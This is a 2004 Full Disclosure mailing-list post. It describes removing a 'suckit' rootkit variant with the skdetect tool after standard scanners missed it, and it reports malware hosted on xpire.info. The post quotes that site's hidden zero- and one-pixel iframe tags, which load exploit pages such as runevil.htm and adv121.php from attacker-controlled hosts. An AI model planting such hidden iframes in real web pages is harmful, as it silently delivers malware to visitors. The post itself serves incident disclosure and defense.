Full Disclosure mailing list archives
Re: xpire.info & splitinfinity.info - exploits in the wild
From: "Elia Florio" <eflorio () edmaster it>
Date: Wed, 27 Oct 2004 01:22:06 +0200
Finally, I clean the compromised box of my friend :)) I've found (following many helpful suggestions of people in FD list) that a variant of "suckit" rootkit was installed on this machine. The strange thing is that "rkhunter" and "chkrootkit" don't catch it :(((( in any way and they said that everything is ok. To found suckit and deactivate it I used this : http://tsd.student.utwente.nl/skdetect/ It's a code based on suckit source code, but without the malware part. It can dig into /dev/kmem and explores sys_call_table[]; skdetect was able to found suckit installed. Another person who was compromised by the "xpire.info" hacker said to me that the symptoms were the same and also in his host he found this suckit variant installed.
suckit version 'Q' DETECTED kernel-part uninstall seems successful.
After reboot everything come back to normal activity. Thank you to everyone for the answers given to me (Ron DuFresne, Nick FitzGerald, Kevin and others). Actually on "xpire.info/fa/?d=get" malware page you can found this exploits in the wild : #IFRAME SRC="http://www.sp2fucked.biz/user28/counter.htm" WIDTH=0 BORDER=0 HEIGHT=0></IFRAME# #iframe src="http://xpire.info/fa/t3.htm" width=1 height=1></iframe# #iframe src="http://xpire.info/fa/x.htm" width=1 height=1></iframe# #iframe src="http://xpire.info/fa/proc.htm" width=1 height=1></iframe# #iframe src="http://xpire.info/fa/runevil.htm" width=1 height=1></iframe# #iframe src="http://213.159.117.133/dl/adv121.php" width=1 height=1></iframe# !-- #IFRAME SRC="http://x.full-tgp.net/?fox.com" WIDTH=1 HEIGHT=1></IFRAME# //--> There a lot of backdoor/trojan ready-to-install and the bad news is that most of this malware are recompiled, so many AV are fooled and don't catch them (for example Symantec and ClamAV don' recognize many malware in this site, after a quick test made with www.virustotal.com) Bye, EF _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- xpire.info & splitinfinity.info - exploits in the wild Elia Florio (Oct 24)
- Re: xpire.info & splitinfinity.info - exploits in the wild Kevin (Oct 24)
- Re: xpire.info & splitinfinity.info - exploits in the wild Elia Florio (Oct 24)
- Re: xpire.info & splitinfinity.info - exploits in the wild Nick FitzGerald (Oct 24)
- Re: xpire.info & splitinfinity.info - exploits in the wild Elia Florio (Oct 24)
- Re: xpire.info & splitinfinity.info - exploits in the wild Ron DuFresne (Oct 25)
- Re: xpire.info & splitinfinity.info - exploits in the wild Elia Florio (Oct 26)
- Re: [SPAM] Re: xpire.info & splitinfinity.info - exploits in the wild Hugo van der Kooij (Oct 26)
- Re: xpire.info & splitinfinity.info - exploits in the wild Elia Florio (Oct 26)
- <Possible follow-ups>
- Re: xpire.info & splitinfinity.info - exploits in the wild bowwow (Oct 24)
- Re: xpire.info & splitinfinity.info - exploits in the wild Elia Florio (Oct 27)
- Re: [SPAM] Re: xpire.info & splitinfinity.info - exploits in the wild Hugo van der Kooij (Oct 27)
- Re: xpire.info & splitinfinity.info - exploits in the wild Kevin (Oct 24)